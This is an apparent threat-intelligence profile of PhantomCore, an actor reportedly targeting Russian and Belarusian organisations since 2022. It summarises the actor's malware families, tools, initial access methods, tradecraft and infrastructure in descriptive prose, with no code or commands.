PhantomCore

PhantomCore is a suspected pro-Ukrainian / Ukraine-linked threat actor assessed by multiple cited reports as operating with Ukrainian interests in mind and targeting Russian and Belarusian organizations since 2022. Reporting describes PhantomCore as conducting cyber-espionage and later shifting at least part of its operations toward ransomware and destructive activity. The group has been linked to attacks against Russian and Belarusian companies across sectors, and one report linked it to compromises of 65 Microsoft Exchange servers in 26 countries, with about one-third of victims appearing to be government systems. PhantomCore is associated with custom malware families including PhantomRAT, PhantomRShell, PhantomTaskShell, PhantomProxyLite, PhantomStealer, Phantom Control Panel, PhantomSscp, PhantomRemote / PhantomeRemote / PhantomCore.PollDL, and PhantomeCore.GreqBackdoor v2. Reporting also describes use of third-party or legitimate tools including MeshAgent, MeshCentral, RSocx, Rclone, OpenSSH, UPX, XenArmor All-In-One Password Recovery Pro, Impacket SMBExec, and LockBit 3.0 in at least one intrusion. Observed initial access methods include spearphishing via compromised corporate email accounts, malicious ZIP/RAR/LNK attachments disguised as documents, phishing links leading to fake CAPTCHA pages that deliver MeshAgent, exploitation of WinRAR CVE-2023-38831, exploitation of TrueConf vulnerabilities BDU:2025-10114, BDU:2025-10115, and BDU:2025-10116, and compromises of Exchange login pages with keylogger code. The actor has used compromised legitimate websites and phishing domains to host payloads. Reported tradecraft includes PowerShell- and cmd-based execution; scheduled-task persistence using names such as Yandex Update, Microsoft Update, Update, SSH, SSHService, DNS, Yandex Task {user_sid}, and MicrosoftStatisticCore-related naming; creation of services and local accounts; web shell deployment on TrueConf servers; DLL hijacking via libEGL.dll; anti-analysis checks in PhantomRAT; obfuscated and Base64-encoded PowerShell; disabling Microsoft Defender; clearing event logs; masquerading malware as legitimate Windows files; and deletion of tools after operations. Post-compromise activity includes host and network discovery with native Windows commands, credential theft from LSASS and NTDS.dit, theft of browser authentication data from Chrome and Yandex via PhantomStealer and XenArmor, lateral movement via RDP, SMB, WinRM, and Impacket SMBExec, and command-and-control over HTTP, HTTPS, and SSH including SSH tunneling over port 443 and use of nonstandard ports such as 81, 8000, and 8080. Infrastructure described in the reporting includes phishing domains with fake CAPTCHAs, VPS servers mostly rented from Russian hosting providers, compromised legitimate servers, DynDNS services, impersonation of services such as Mattermost and Nextcloud, and Mega.nz accounts for exfiltration. The reporting also notes overlaps between PhantomCore and Bearlyfy, and one source explicitly refers to PhantomCore as "PhantomCore (Head Mare)."